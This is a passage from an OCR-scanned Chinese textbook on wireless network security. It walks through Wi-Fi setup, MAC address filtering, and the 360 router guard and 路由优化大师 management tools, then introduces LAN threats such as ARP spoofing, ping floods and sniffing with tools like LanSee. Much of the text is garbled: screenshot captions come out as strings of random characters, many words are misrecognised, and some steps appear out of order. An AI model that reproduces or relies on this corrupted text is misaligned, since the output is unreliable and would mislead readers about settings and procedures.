称 ” 文 本 框 中 输入 要 连接 网 络 的 SSID 号 ， 
本 实例 输入 ssh， 单 击 “ 确 定 ” 按 钮 ， 如 下 
图 所 示 。 


键入 网 络 的 名 称 (SSID) 


名 称 (A): ssh 


[step 园 在 “安全 密 钥 ”文本 框 中 输入 无 线 网 
络 的 密 钥 ， 本 实例 输入 密 钥 sushi1986， 单 
击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


键入 网 络 安全 密 钥 


安全 密 铀 (5): sushi1986 


回 降 蕊 放 符 (H) 


[see 国 单 去 系统 桌面 右 下 角 固 图 标 ， 将 饼 
标 放 在 ssh 选 项 上 可 以 看 到 无 线 网 络 的 连接 
情况 。 下 图 所 示 表 明 无 线 客 户 端 已 经 成 功 
连接 到 无 线路 由 器 ， 如 下 图 所 示 。 


当前 连接 到 : 


= 未 职 别 的 网 络 
TY 无 Intemet 访问 


人 ssh 
从 Internet 访问 


13.2.5 ”媒体 访问 控制 (MAC) 地 址 过 滤 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 常 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客 户 端的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 

具体 操作 步骤 如 下 。 
[Stes 图 打开 路 由 器 的 Web 后 台 设置 界面 ， 单 
击 左 侧 “无线 参数 ”一 “无 线 网 络 MAC 地 
址 过 滤 设 置 ” 选 项 ， 默 认 情 况 MAC 地 址 过 
滤 功 能 是 关闭 状态 ， 单 击 “ 启 用 过 滤 ” 按 
钮 ， 开 启 MAC 地 址 过 滤 功 能 ， 单 击 “ 添 加 
新 条 目 ”按钮 ， 如 下 图 所 示 。 


无 线 网 络 WA 地 址 过 下 设置 


本 页 设 回 NAC 地址 过 送 未 控制 计算 机 对 本 无 绪 网 络 的 访问 。 


HA 地址 过 天 功能 : 
过 于 规则 
会 允许 列表 中 生效 规则 之 人 83nAC 地 址 访问 本 无 绪 了 络 
个 吉 IL 列表 中 生效 规 风 之 外 guAC 地 址 访问 本 无 续 P3 络 
Cl mW 
添加 新 条 目 ] [ 所有 永 自 主 分 
EF | 


已 关闭 


Lam ] 


[We EE EE 


所 有 系 目 天 于 ia] 


[sep 图 打开 “无 线 网 络 MAC 地 址 过 滤 设 
置 ” 对 话 框 ， 在 “MAC 地 址 ”文本 框 中 
输入 无 线 客 户 端的 MAC 地 址 ， 本 实例 输 
入 MAC 地 址 为 00-0c-29-SA-3C-97， 在 “ 描 
述 ”文本 框 中 输入 MAC 描 述 信息 sushipc， 

在 “类 型 ”下 拉 列 表 中 选择 “允许 ” 选 
项 ， 在 “状态 ”下 拉 列 表 中 选择 “生效 ” 
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选项 ， 依 照 此 步骤 将 所 有 合法 的 无 线 客 户 
端的 MAC 地 址 加 入 此 MAC 地 址 表 后 ， 单 去 
“保存 ”按钮 ， 如 下 图 所 示 。 


天 于 综 thC 地 址 过 小 设 和 


本 页 过 计算 机 对 本 无 线 网 络 的 访问 。 

MC 地 址 : [00-0c-29-5A-3C-97 

指 述 : sushipe 

类 型 : 元 许 到 

状态 : 生效 到 
a 


选择 “过 滤 规 则 ”选项 下 的 “禁止 ” 
单 选 框 ， 表 明 在 下 面 MAC 列 表 中 生效 规则 
之 外 的 MAC 地 址 不 可 以 访问 无 线 网 络 ， 如 
下 图 所 示 。 


条 志 理 飞 吉 要 各 条 错 接 ， 如 Iaterzet 莲 戏 ， 视 频 全 议 ， 网 电话 等 。 由 于 防火 增 8 让 在 ， 这 
些 得 序 无 法 在 简单 的 ENT 器 由 下 工作 * 特殊 应 用 程序 使 得 其 些 这样 的 应 用 程序 能 RAT 路 
由 下 工作 


卫 | _ 神 帮 漠 口 [a 开 襄 浦 口 开 训 协 议 _| 类 杰 | 坑 得 
Er 1 sl 
上 -页 | [下 = 页 | [各 有 


这 样 无 线 客 户 端 在 访问 无 线 AP 时 ， 
会 发 现 除 了 MAC 地 址 表 中 的 MAC 地 址 之 
外 ， 其 他 的 MAC 地 址 无 法 再 访问 无 线 AP， 
也 就 无 法 访问 互联 网 。 


13.3 ”无 线路 由 安全 管理 工具 


使 用 无 线路 由 管理 工具 可 以 方便 管理 
无 线 网 络 中 的 上 网 设备 ， 本 节 就 来 介绍 两 
个 无 线路 由 安全 管理 工具 ， 包 括 360 路 由 器 
卫士 与 路 由 优化 大 师 。 


13.3.1 360 路 由 器 卫士 


360 路 由 器 卫士 是 一 款 由 360 官 方 推 
出 的 绿色 免费 的 家 庭 必 备 无 线 网 络 管理 工 
具 。360 路 由 器 卫士 软件 功能 强大 ， 支 持 几 
乎 所 有 的 路 由 器 。 在 管理 的 过 程 中 ， 一 旦 
发 现 蹦 网 设备 想 中 就 踢 。 下 面 介 绍 使 用 360 
路 由 器 卫士 管理 网 络 的 操作 方法 。 
[ssp 加 下 载 并 安装 360 路 由 器 卫 土 ， 双 击 桌 
面 上 的 快捷 图 标 ， 打 开 “ 路 由 器 卫士 ” 工 
作 界 面 ， 提 示 用 户 正在 连接 路 由 ， 如 下 图 
所 示 。 


Ee 
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[step 图 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提醒 您 ”对 话 框 ， 在 其 中 输入 路 由 账号 与 密码 ， 如 


下 图 所 示 。 
© 


请 纺 入 你 的 牙 由 圳 帐号 和 密码 


me, 


Me 


[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “我 的 路 由 ”工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 线 设 
备 ， 如 下 图 所 示 。 


路 由 器 卫士 in 由 如 由 防 棵 。。 器 由 只 RIR hi 


在 细 (5] em(0) OM 


DESKTOP-67NQ_ 2 


P192.168.0.105 


ee 
ps216a di08 (I BHCEY 


人 CE) Ce 


1P:192168.0107 


AFolG-611211… 2 
ieH 


IP-1921680112 


如 果 想 要 对 某 个 设备 限 速 ， 则 可 以 单 击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 对 话 
框 ， 在 其 中 设置 设备 的 上 传 速度 与 下 载 速度 ， 设 置 完成 后 单 击 “ 确 认 ” 按 钮 即 可 保存 设置 ， 


如 下 图 所 示 。 
限 速 
上 人 过 庆 恨 知 。 |5 re 
Ts 6 | [mev 
吐 示 下 恨 迹 ,县 高 限 过 10M 
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[step 较 在 管理 的 过 程 中 ， 一 旦 发 现 有 中 网 设备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ”按钮 ， 
如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 。 路 由 防 黑 路 出 下 分 


(6) 轨 各 音 (0) 


AFOIG%2D6112.. 2 * 23KB/s 
IFIa21680112 275KB/S 


AFolG%2D7021. 2 ® OKB/s 
IP:1921680114 OKB/s 


WET%BD%91%E7.. 2 6KB/S 
IP:t32.1680.108 116KB/s 


HUAWEI%SFMAI. CE OKB/S 
Ry B/s 
Ne Sets 


[图 禁 止 上 网 完成 后 ， 单 击 “ 黑 名 单 ” 选 项 卡 ， 进 入 “ 黑 名 单 ”设置 界面 ， 在 其 中 可 以 
看 到 被 禁止 的 上 网 设备 ， 如 下 图 所 示 。 


路 由 器 卫士 也 的 路 由 路 册 防 涤 。。 路 由 中 分 扩展 工具 


(5) 号 oa 人 人) 


目 HUAWEIWSFMAI... 2 


[Bee 选择 “路 由 防 黑 ”选项 卡 ， 进 入 “路 由 防 黑 ” 设 置 界 面 ， 在 其 中 可 以 对 路 由 器 进行 
防 黑 检 测 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 
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step 罗 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 路 由 器 进行 检测 ， 并 给 出 检测 结果 ， 如 下 图 
所 示 。 


您 的 路 由 器 能 抵御 黑客 入 侵 ， 请 放心 上 网 Em 


加 DHCp 各 另 的 DNS 安全 ，- 网 不 号 入 双生 
四 DMZ 主 机 服务 关 末 ,不 司 夺 林产 探 欠 
@ 未必 画 “ 全 运 斌 二 而 届 , 不 司 福 号 罕 攻 本 和 入 运 


加 中 由 入 入 到 术 为 安全 不 时 时 在 入 人民 
加 WiFi 可 Ri0 方 式 守 全 , 不 号 杯 人 人民 网 


委 澡 电 章 唱 


选择 “路 由 跑 分 ”选项 卡 ， 进 入 “路 由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 路 由 
器 信息 ， 如 下 图 所 示 。 


路 由 器 信息 
路 由 器 名 称 : TL-WR886N 处 理 器 架构 : MIPS 
处 理 器 型 号 ; TP9343-AL3A 无 线 传输 速达 : 450 Mbps 
处 理 昭 品牌 : Qualcomm 内 存 :16 MB 
处 理 照 主 频 : 750 MHz 闪存 :2MB8 


正在 评估 路 由 器 性 能 


41% 
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Step 本 评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 中 给 出 跑 分 排行 榜 信 息 ， 如 下 图 所 示 。 


各 喇 册 号 得 分 “5805 分 ， 全 国 排 名 103692 名 ,二 改 了 全 目 63% 的 &%EE | 信守 车 


路 由 跑 分 排行 榜 
ws326 HUAWEI MODEL 
| 
ER FWR-706 [ER 
TP-LINK TL-wRS85N 1.0 [EC 
HG532E HUAWEI MODEL 
TP-LINK TL-WR840N 3.0 ER 
D-LINK DIR-600M 1 
RaooM 


选择 “路 由 设置 ”选项 卡 ， 进 入 “路 由 设置 ”界面 ， 在 其 中 可 以 对 宽带 上 网 、WiFi 
密码 、 路 由 器 密码 等 选项 进行 设置 ， 如 下 图 所 示 。 


路 由 时 光 机 【 wune ] 


选择 “路 由 时 光 机 ”选项 卡 ， 在 打开 的 界面 中 单 击 “立即 开启 ”按钮 ， 即 可 打开 登 
录 界 面 ， 在 其 中 输入 360 账 号 与 密码 ， 然 后 单 击 “ 立 即 登录 并 开启 ”按钮 ， 即 可 开启 时 光 


机 ， 如 下 图 所 示 。 


登录 您 的 360 手 机 账号 即 可 开启 时 光 机 


Step 可 选择 “宽带 上 网 ”选项 卡 ， 进 入 “宽带 上 网 ”界面 ， 在 其 中 输入 网 络 运营 商 给 出 的 


261 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


上 网 账号 与 密码 ， 单 击 “ 保 存 设 置 ” 按 钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


Osan Bn 


宽带 上 网 


选择 “WiFi 密码” 选项 卡 ， 进 入 “WiFi 密 码 ” 界 面 ， 在 其 中 输入 WiFi 密 码 ， 单 击 
“保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


sn an wen (人 sonsn > sce 


让 呈 三 会 攻 少 护 号 网 的 风 洽 ， 傅 冯 后 所 和 的 手机 
WIFI 各 。 %E5%8D%83%EB%BOWB7%E7%A79915 
WE [3 


WFi 窗 码 xr- 


选择 “路 由 器 密码 ”选项 卡 ， 进 入 “路 由 器 密码 ”界面 ， 在 其 中 输入 路 由 器 密码 ， 
单 击 “ 保 存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


加 sa 四 FRR 上 网 人 wien (2) is > < mesg 


\/ 


oo | 
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Step 可 选择 “重启 路 由 器 ”选项 卡 ， 进 入 “重启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 可 
对 当前 路 由 器 进行 重启 操作 ， 如 下 图 所 示 。 


和 ES EEC 


另外 ， 使 用 360 路 由 器 卫士 在 管理 无 线 网 络 安全 的 过 程 中 ， 一 旦 检测 到 有 设备 通过 路 
由 器 上 网 ， 就 会 在 计算 机 桌面 的 右上 角 弹 出 信息 提示 框 ， 如 下 图 所 示 。 


me .3 
一 iphone%. 上 线 了 时 


单 击 “ 管 理 ” 按 钮 ， 即 可 打开 该 设备 的 详细 信息 界面 ， 在 其 中 可 以 对 网 速 进 行 限制 管 
理 ， 最 后 单 击 “ 确 认 ” 按 钮 即 可 ， 如 下 图 所 示 。 


名 称 iPhonex206 必 


详细 信息 。 IP 地 址 92.168.0.100 


MAC 地 址 : A4-5E-60-16-7A-A1 


网 可 管理 。 msm 


OKB/s 
当 疝 网 速 


13.3.2 ”路 由 优化 大 师 


路 由 优化 大 师 是 一 款 专业 的 路 由 器 设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 由 、 屏 广 
告 、 防 蹄 网 、 路 由 器 全 面 检测 及 高 级 设置 等 ， 从 而 保护 路 由 器 安全 。 

使 用 路 由 优化 大 师 管 理 无 线 网 络 安全 的 操作 步骤 如 下 : 
[step 图 下 载 并 安装 路 由 优化 大 师 ， 双 击 桌 面 上 的 快捷 图 标 ， 即 可 打开 “路 由 优化 大 师 ” 的 
工作 界面 ， 如 下 图 所 示 。 
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登录 凋 由 举 (TP-Uink) 


[Eee 图 单 去 “和 登录” 按钮， 打开 RMTools 窗 口 ， 在 其 中 输入 管理 员 密码 ， 如 下 图 所 示 。 


@ RMTools 二 曾 x 


刷新 | 后 县 关闭 《路 由 管理 URL; |http://192.158.0.1/ | e@ 保存 


[step 图 单 击 “确定 ”按钮 ， 即 可 进入 路 由 器 工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访客 网 
络 信息 ， 如 下 图 所 示 。 


0 i Pe 
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step 国 单 击 “ 设 备 管理 ”图 标 ， 进 入 “设备 管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 线 网 
络 中 的 连接 设备 ， 如 下 图 所 示 。 


© RMrooks = 昌 其 


Mi RR Be rer 人 Ce Ce 


-rp 
EE 


> 


[Eee 图 如 果 想 要 对 某 个 设备 进行 管理 ， 则 可 以 单 击 “ 管 理 ” 按 钮 ， 进 入 该 设备 的 管理 界 
面 ， 在 其 中 可 以 设置 设备 的 上 传 速度 、 下 载 速度 以 及 上 网 时 间 等 信息 ， 如 下 图 所 示 。 
i HUAWET MAIMA 


IP : 192.168.0.103 | MAC je-52-3b-17-01 | 无 线 连 接 


@ 0KB/s @ 0KB/s 


上 传 速度 无 限制 下 载 速 度 无 限制 


网 时 间 设 置 


许 上 网 时 间 段 


[sep 图 单 去 “添加 允许 上 网 时 间 段 ” 超 链接 ， 即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 其 中 可 
以 设置 时 间 段 描述 信息 、 开 始 时 间 、 结 束 时 间 等 ， 如 下 图 所 示 。 


[wo “|s 


bh 9| Eal 吉 | Ea Fal Ea 


step 国 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 上 网 时 间 段 的 设置 操作 ， 如 下 图 所 示 。 
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[step 较 单 去 “应 用 管理 ”图 标 ， 即 可 进入 “应 用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 路 由 优 
化 大 师 为 用 户 提供 的 应 用 程序 ， 如 下 图 所 示 。 


1p 与 MAC 听 定 


版 本 :1012 大 小 :23.9K8 


DMZ 主 机 


[Eee 图 如 果 想 要 使 用 某 个 应 用 程序 ， 则 可 以 单 击 某 应 用 程序 下 的 “进入 ”按钮 ， 进 入 该 应 
用 程序 的 设置 界面 。 本 实例 单 击 “ 无 线 设备 接 入 控制 ”图 标 ， 如 下 图 所 示 。 


无 线 设备 接 入 控制 


接 入 控制 功能 ”开局 ? 


只 允许 列 守 内 的 设备 连接 到 主人 网 络 


允许 接 入 设备 列表 
EZ FY C3 CI 


图 并 MACIB 直 


请 标 允 洗 连 潜 主 人 网 沧 的 设备 志 因 到 列表 三 中 


[EEes 轿 单 直 “路 由 设置 ”图 标 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 设置 信息 ， 如 下 图 
所 示 。 
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© RMrook 7 


| [Ea Ra) #eeen: For ea [= [Tw] 


TP-UINK I TL-WaaseN 


路 由 设置 TP-LINK ID 
阁 TP-UNKID 


step 贺 选择 左 侧 的 “上 网 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 设置 ， 
如 下 图 所 示 。 


step 图 选择 左 侧 的 “无 线 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 无 线 功能 进行 开关 、 
名 称 、 密 码 等 信息 的 设置 ， 如 下 图 所 示 。 
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LAN 口 设置 


step 图 选择 左 侧 的 “LAN 口 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 LAN 口 进行 设置 ， 


设置 ， 如 下 图 所 示 。 


Step| 


选择 左 侧 的 


© Mroon 


El le [ee lsle | 


TIP-LaNK | TL-WRSS6N 


路 由 设置 DHCP 服 务 器 


> 


“软件 升级 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 优化 


级 操作 ， 如 下 图 所 示 。 


ml BD se rr eat [ele | 


step 贺 选择 左 侧 的 “DHCP 服 务 器 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 DHCP 服 务 器 进行 


大 师 的 版 本 进行 升 
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Step 图 选择 左 侧 的 “修改 管理 员 密 码 ” 选 项 ， 在 打开 的 界面 中 可 以 对 管理 员 密 码 进 行 修改 
设置 ， 如 下 图 所 示 。 


EE EH md Ey i 


step 回 选择 左 侧 的 “备份 和 载 入 配置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 的 配置 进 
行 备份 和 载 入 设置 ， 如 下 图 所 示 。 


| a Ra) see ee [J[ 


E55 图 选择 左 侧 的 “重启 和 恢复 出 厂 ” 选 项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 进行 重启 
和 恢复 出 厂 设 置 ， 如 下 图 所 示 。 


[ 工 人 


i [| sean Fe rey je- [wm 
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step 了 选择 左 侧 的 “系统 日 志 ” 选 项 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 信 
息 ， 如 下 图 所 示 。 


区 
TP-UINK | TLWasseN 


路 由 设置 


[step 图 路 由 器 设备 设置 完毕 后 ， 返 回 到 路 由 优化 大 师 的 工作 界面 中 ， 选 择 “ 防 中 网 ” 选 
项 ， 在 打开 的 界面 中 可 以 进行 防 中 网 设置 ， 如 下 图 所 示 。 


CE 
FG) SP) CC 

Om Ce 
令 Al 1921680112 40m C= EB 
@ DEsKToP DsxFISE 1921680107 2408 (CB = ) 


选择 “ 屏 广告 ” 选项， 在 打开 的 界面 中 可 以 设置 视频 过 滤 广 告 是 否 开启 ， 如 下 图 所 示 。 


视频 过 滤 广 告 未 开启 


TD 过 三 人 后 , 使 用 电 肝 天 本 类 ,不 会 册 琢 广 告 | 
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[step 图 单 南 “开启 广告 过 滤 ” 按 钮 ， 即 可 开启 视频 过 滤 广 告 功 能 ， 如 下 图 所 示 。 


视频 过 滤 广 告 已 开启 


厅 开 要 了 这 站 六 半 ,医用 及 五 机 网 ， 不 全 出 规 广 告 


RE 


视频 过 滤 广 告 已 开启 


FR 又 广 生生 ， 体 用 中央 看 柱 站 ， 不 全 出 更 广 丁 
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step 图 单 击 “开启 测速 ”按钮 ， 即 可 对 当前 网 络 进行 测速 操作 ， 测 出 来 的 结果 显示 在 工作 
界面 中 ， 如 下 图 所 示 。 


速度 为 56,34MB/ 秒 ,相当 于 50M 00M 的 带 完 


13.4 实战 演练 


实战 演练 1 一 一 控制 无 线 网 中 设备 的 上 网 速度 

在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 终端 设 
备 的 上 网 情况 ， 管 理 员 可 以 通过 路 由 器 控制 上 网 设备 的 上 网 速度 ， 有 具体 的 操作 步骤 如 下 。 
[step 图 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 其 中 选择 “IP 宽 带 控 制 ” 选 项 ， 在 右 侧 的 窗 格 
中 可 以 查看 相关 的 功能 信息 ， 如 下 图 所 示 。 


日 TEwnaasn x 医 


一 口 
ey | 女 | 二 多 


区 


TIP-LINNK” [一 一 NN 针线 诬 罕 盖 蕊 现 无 线 自 由 连 硫 臣 杷 


三 Fi 芝 刘 全 制 虽 开启 与 关 半 迁 行 设置 -只 有 洒 之 守信 全 开关 为 开启 寺 ， 二 09 “之 守 竺 名 规 I" 二 能 艇 
二 区 


区 :反之 ， 风 | 


step 图 选中 “开启 IP 宽 带 控制 ” 复 选 框 ， 即 可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 宽带 和 
下 行 总 宽带 数 进行 设置 ， 进 而 控制 终端 设置 的 上 网 速度 ， 如 下 图 所 示 。 
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口 TLwRaa5N x 十 过 


€ 3 口 | ea 


TIP-LITNIK- 


THE 


本 


实战 演练 2 一 一 通过 修改 WiFi 名 称 隐藏 路 由 器 

WiFi 的 名 称 通常 是 指 路 由 器 当中 SSID 号 的 名 称 ， 该 名 称 可 以 根据 自己 的 需要 进行 修 
改 ， 从 而 可 以 在 一 定 程度 上 隐藏 路 由 器 ， 具 体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 其 中 选择 “无 线 设置 ”选项 下 的 “基本 设置 ” 
选项 ， 打 开 “ 无 线 网 络 基 本 设置 ”工作 界面 ， 如 下 图 所 示 。 


TL-WRe85N x 至 SO 


192.168.0.1 


本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 


SSIDS: TP-LINKL 
信道 : 自动 v 
模式 : Ti mined ~ 
频段 带宽 : 自动 4 
回 开启 无线 功能 
回 开启 sszp 广 播 
口 开启 ms 
保存 | | 帮助 


step 图 将 SSID 号 的 名 称 由 TP-LINK1 修 改 为 WiFi， 最 后 单 击 “保存 ”按钮 ， 即 可 保存 WiFi 
修改 后 的 名 称 ， 如 下 图 所 示 。 
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旺 TL-WR885N 


€ 全 © | "zicaol 


S310: 
信道 : 自动 ~Y 


模式 : 11bgn mixed ~ 
频段 希 帘 : 自动 4 
开启 无 线 功能 


加 开启 so 广播 
口 开启 ms 


13.5 “小 试 身手 
练习 1: 无 线路 由 器 的 基本 设置 。 


练习 2: 无 线路 由 器 的 安全 策略 。 
练习 3: 无 线路 由 安全 管理 工具 的 使 用 。 
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无 线 局 域 网 作为 计算 机 网 络 的 一 个 重要 成 员 已 经 被 广泛 应 用 于 社会 的 各 个 领域 。 目 
前 黑客 利用 各 种 专门 攻击 无 线 局 域 网 工具 对 无 线 局 域 网 进行 攻击 ， 本 章 介 绍 无 线 局 域 网 
的 安全 防护 ， 主 要 包括 无 线 局 域 网 的 查看 、 无 线 局 域 网 的 攻击 、 无 线 局 域 网 安全 辅助 工 


具 等 。 


14.1 无 线 局 域 网 的 安全 介绍 


目前 越 来 越 多 的 企业 建立 自己 的 无 线 
局 域 网 以 实现 企业 信息 资源 共享 或 者 在 无 
线 局 域 网 上 运行 各 类 业务 系统 。 随 着 企业 
无 线 局 域 网 应 用 范围 的 扩大 、 保 存 和 传输 
的 关键 数据 增多 ， 无 线 局 域 网 的 安全 性 问 
题 日 益 突出 。 


14.1.1 无 线 局 域 网 基础 知识 


大 家 日 常 接触 的 办 公 网 络 大 部 分 是 无 
线 局 域 网 ， 如 各 个 企业 、 学 校 、 政 府 机 关 
等 部 门 中 的 网 络 。 无 线 局 域 网 主要 用 于 一 
个 部 门 内 部 ， 常 局 限于 一 个 建筑 物 之 内 。 
在 企业 内 部 利用 无 线 局 域 网 办 公 已 成 为 其 
经 营 管理 活动 必 不 可 少 的 一 部 分 。 

无 线 局 域 网 是 指 在 某 一 区 域内 由 多 台 
计算 机 互联 成 的 计算 机 组 ， 一 般 是 方圆 几 
十 米 。 无 线 局 域 网 把 个 人 计算 机 、 工 作 站 
和 服务 器 连 在 一 起 ， 在 无 线 局 域 网 中 可 以 
进行 管理 文件 、 共 享 应 用 软件 、 共 享 打 印 
机 、 安 排 工作 组 内 的 日 程 、 发 送 电子 邮件 
和 传真 通信 服务 等 操作 。 无 线 局 域 网 是 封 
闭 型 的 ， 可 以 由 办 公 室 内 的 两 台 计 算 机 组 
成 ， 也 可 以 由 一 个 公司 内 的 数 百 台 计 算 机 
组 成 。 

由 于 距离 较 近 ， 传 输 速率 较 快 ， 为 
10 一 1000Mb/s。 无 线 局 域 网 常见 的 分 类 方 
法 有 以 下 几 种: 


Ring ( 令 牌 环 ) 等 。 

(2) 按 联 网 的 主机 间 的 关系 ， 可 分 
为 两 类 ， 如 对 等 网 和 C/S (客户 /服务 
器 ) 网 。 

(3) 按 使 用 的 操作 系统 不 同 可 分 为 许 
多 种 ， 如 Windows 网 和 Novell 网 。 

无 线 局 域 网 最 主要 的 特点 是 : 网 络 为 
一 个 单位 所 拥有 ， 且 地 理 范围 和 站 点 数目 
均 有 限 。 无 线 局 域 网 具有 如 下 的 一 些 主要 
优点 : 

(1) 网 内 主机 主要 为 个 人 计算 机 ， 是 
专门 适 于 微机 的 网 络 系统 。 

(2) 覆盖 范围 较 小 ， 适 于 单位 内 部 
联网 。 

(3) 传输 速率 高 ， 误 码 率 低 。 

(4) 系统 扩展 和 使 用 方便 ， 可 共享 昂 
贵 的 外 部 设备 、 软 件 和 数据 。 

(5) 可 靠 性 较 高 ， 适 于 数据 处 理 和 办 
公 自 动 化 。 

无 线 局 域 网 非常 灵活 ， 两 台 计 算 机 就 
可 以 连 成 一 个 无 线 局 域 网 。 无 线 局 域 网 的 
安全 是 内 部 网 络 安全 的 关键 ， 如 何 保证 无 
线 局 域 网 的 安全 性 成 为 网 络 安全 研究 的 一 
个 重点 。 


14.1.2 无 线 局 域 网 安全 隐患 
随 着 人 类 社会 生活 对 Internet 需 求 的 日 
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益 增 长 ， 网 络 安全 逐渐 成 为 Internet 及 各 项 
网 络 服务 和 应 用 进一步 发 展 的 关键 问题 。 
网 络 使 用 户 以 最 快速 度 获取 信息 ， 但 是 非 
公开 性 信息 的 被 盗用 和 破坏 ， 是 目前 无 线 
局 域 网 面临 的 主要 问题 。 


1. 无 线 局 域 网 病毒 


在 无 线 局 域 网 中 ， 网 络 病毒 除了 具有 
可 传播 性 、 可 执行 性 、 破 坏 性 、 隐 项 性 等 
计算 机 病毒 的 共同 特点 外 ， 还 具有 以 下 几 
个 新 特点 : 

(1) 传染 速度 快 。 在 无 线 局 域 网 中 ， 
由 于 通过 服务 器 连接 每 一 台 计 算 机 ， 这 不 
仅 给 病毒 传播 提供 了 有 效 的 通道 ， 而 且 病 
毒 传播 速度 很 快 。 在 正常 情况 下 ， 只 要 网 
络 中 有 一 台 计算 机 存在 病毒 ， 在 很 短 的 时 
间 内 ， 将 会 导致 无 线 局 域 网 内 计算 机 相互 
感染 繁殖 。 

(2) 对 网 络 破坏 程度 大 。 如 果 无 线 局 
域 网 感染 病毒 ， 将 直接 影响 到 整个 网 络 系 
统 的 工作 ， 轻 则 降低 速度 ， 重 则 破坏 服务 
器 重要 数据 信息 ， 甚 至 导致 整个 网 络 系统 
骨 溃 。 

(3) 病毒 不 易 清 除 。 清 除 无 线 局 域 网 
中 的 计算 机 病毒 ， 要 比 清除 单机 病毒 复杂 
得 多 。 无 线 局 域 网 中 只 要 有 一 台 计 算 机 未 
能 完全 消除 病毒 ， 就 可 能 使 整个 网 络 重新 
被 病毒 感染 ， 即 使 刚刚 完成 清除 工作 的 计 
算 机 ， 也 很 有 可 能 立即 被 无 线 局 域 网 中 的 
另 一 台 带 病毒 计算 机 所 感染 。 


2. ARP 攻 击 


ARP 攻 击 主要 存在 于 无 线 局 域 网 网 络 
中 ， 对 网 络 安全 危害 极 大 。ARP 攻 击 就 
是 通过 伪造 的 IP 地 址 和 MAC 地 址 ， 实 现 
ARP 其 骗 ， 它 可 以 在 网 络 中 产生 大 量 的 
ARP 通 信 数 据 ， 使 网 络 系统 传输 发 生 阻 
塞 。 如 果 攻 击 者 持续 不 断 地 发 出 伪造 的 
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ARP 响 应 包 ， 就 能 更 改 目 标 主 机 ARP 缓 存 
中 的 IP-MAC 地 址 ， 造 成 网 络 遭 受 攻 击 或 
中 断 。 


3. Ping 洪 水 攻击 


Windows 提 供 一 个 Ping 程 序 ， 使 用 它 可 
以 测试 网 络 是 否 连接 。Ping 洪 水 攻击 也 称 
为 ICMP 入 侵 ， 是 利用 Windows 系 统 的 漏洞 
来 入 侵 的 。 这 种 攻击 方式 也 称 DoS 攻 击 〈 拒 
绝 服务 攻击 ) ， 即 在 一 个 时 段 内 连续 向 服 
务 器 发 出 大 量 请 求 ， 服 务 器 来 不 及 响应 而 
死机 。 


4. 嗅 控 


无 线 局 域 网 是 黑客 进行 监听 嗅 探 的 
主要 场所 。 黑 客 在 无 线 局 域 网 内 的 一 个 主 
机 、 网 关上 安装 监听 程序 ， 就 可 以 监听 出 
整个 无 线 局 域 网 的 网 络 状态 、 数 据 流动 、 
传输 数据 等 信息 。 因 为 一 般 情 况 下 ， 用 户 
的 所 有 信息 ， 例 如 账号 和 密码 ， 都 是 以 明 
文 的 形式 在 网 络 上 传输 的 。 目 前 可 以 在 无 
线 局 域 网 中 进行 嗅 探 的 工具 很 多 ， 例 如 
Sniffer 等 。 


无 线 局 域 网 的 查看 


利用 专门 的 无 线 局 域 网 查看 工具 可 以 
查看 无 线 局 域 网 中 各 个 主机 的 信息 ， 本 节 
将 介绍 两 款 非常 方便 实用 的 无 线 局 域 网 查 
看 工具 。 


14.2 


14.2.1 使 用 LanSee 工 具 


局 域 网 查看 工具 (LanSee) 是 一 款 对 
局 域 网 上 的 各 种 信息 进行 查看 的 工具 。 它 
集成 了 局 域 网 搜索 功能 ， 可 以 快速 搜索 出 
计算 机 (包括 计算 机 名 、IP 地 址 、MAC 
地 址 、 所 在 工作 组 、 用 户 ) 、 共 享 资源 、 


共享 文件 ， 可 以 捕获 各 种 数据 包 (TCP、 
UDP、ICMP、ARP) ， 甚 至 可 以 从 流 过 网 
卡 的 数据 中 嗅 探 出 QQ 号 码 、 音 乐 、 视 频 、 
图 片 等 账号 、 文 件 。 

使 用 该 工具 查看 无 线 局 域 网 中 各 种 信 
息 的 具体 操作 步骤 如 下 : 
